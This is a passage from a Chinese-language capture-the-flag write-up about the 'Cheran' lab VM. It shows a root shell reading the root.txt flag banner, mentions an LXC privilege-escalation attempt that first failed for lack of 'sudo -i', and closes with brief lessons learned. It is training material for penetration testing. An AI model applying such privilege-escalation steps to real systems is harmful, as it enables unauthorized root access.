drwxr-xr-x    2 root     root        4.0K Jul 29  2020 srv
-rw-------    1 root     root      472.5M Jul 29  2020 swapfile
dr-xr-xr-x   13 root     root           0 Jan 31 02:46 sys
drwxrwxrwt   11 root     root        4.0K Jan 31 04:30 tmp
drwxr-xr-x   10 root     root        4.0K Jul 29  2020 usr
drwxr-xr-x   14 root     root        4.0K Jul 29  2020 var
lrwxrwxrwx    1 root     root          31 Jul 29  2020 vmlinuz -> boot/vmlinuz-4.15.0-112-generic
lrwxrwxrwx    1 root     root          31 Jul 29  2020 vmlinuz.old -> boot/vmlinuz-4.15.0-112-generic
/mnt/root # cd root
/mnt/root/root # ls -alh
total 28K    
drwx------    3 root     root        4.0K Jul 29  2020 .
drwxr-xr-x   23 root     root        4.0K Jul 29  2020 ..
-rw-r--r--    1 root     root        3.0K Apr  9  2018 .bashrc
drwxr-xr-x    3 root     root        4.0K Jul 29  2020 .local
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
-rw-------    1 root     root         849 Jul 29  2020 .viminfo
-rw-r--r--    1 root     1001        2.2K Jul 29  2020 root.txt
/mnt/root/root # cat root.txt



  Bow & Arrow                                (/,**                              
  %%/  /***********/(.Cheran Flag.)/*******////*/*                              
  /(,,                   /*****/((((//******/   //                              
  /(,               .,,                         /(                              
  /(,                */,                        /                               
  (#,               ,    ,,,                   ./                               
  (#              ,        ,,,                 //                               
  (#            ..        ,,,                  /(                               
  ##           .(,,,,,,,,,,,,,,,               /,                               
  ##             *        ,,                   *.                               
  ##              ,        ,,                  *                                
  ##               *    .,,,                  /*                                
  ##                **,                     /*                                  
  #%               ,,                *****                                      
  #%  **,    .*****************,                                                
  #%*.                                                                          
  %%   Congrats...                                                                         
  ##                                                                               
  ##                                                                           
  #(      Here is the Flag...                                                                   
  #*                                                                            
 .#*                                                                               
 .(*         Share your screenshot in telegram : https://t.me/joinchat/N06BGRSyCLUnOBsONd9fxg                                                                   
  *                                                                             
                                                                                
                                                                                
/mnt/root/root # 

导致开始的时候利用lxc提权失败,主要原因是sudo 切换用户的时候没有加上-i选项

┌──(kali㉿kali)-[~/Toolsets]
└─$ man sudo | grep -e '-i'
          [-T timeout] [-u user] [VAR=value] [-i | -s] [command]
     -i, --login
                 manual documents how the -i option affects the environment in which a command is run when the sudoers
     -n, --non-interactive
     MAIL             Set to the mail spool of the target user when the -i option is specified, or when env_reset is en‐
     HOME             Set to the home directory of the target user when the -i or -H options are specified, when the -s
     LOGNAME          Set to the login name of the target user when the -i option is specified, when the set_logname op‐
                                                                                                                              
┌──(kali㉿kali)-[~/Toolsets]
└─$ 

经验教训

  1. 由于靶机网络模式设置为host-only,导致作者设置的关键线索无法得到(需要联网)

  2. sudo切换用户的时候可能需要加上-i选项,即login,这样才能得到一些环境变量

标签:cheran,EE,kali,Cheran,29,192.168,56.201,靶机,root
From: https://www.cnblogs.com/jason-huawen/p/17078615.html

相关文章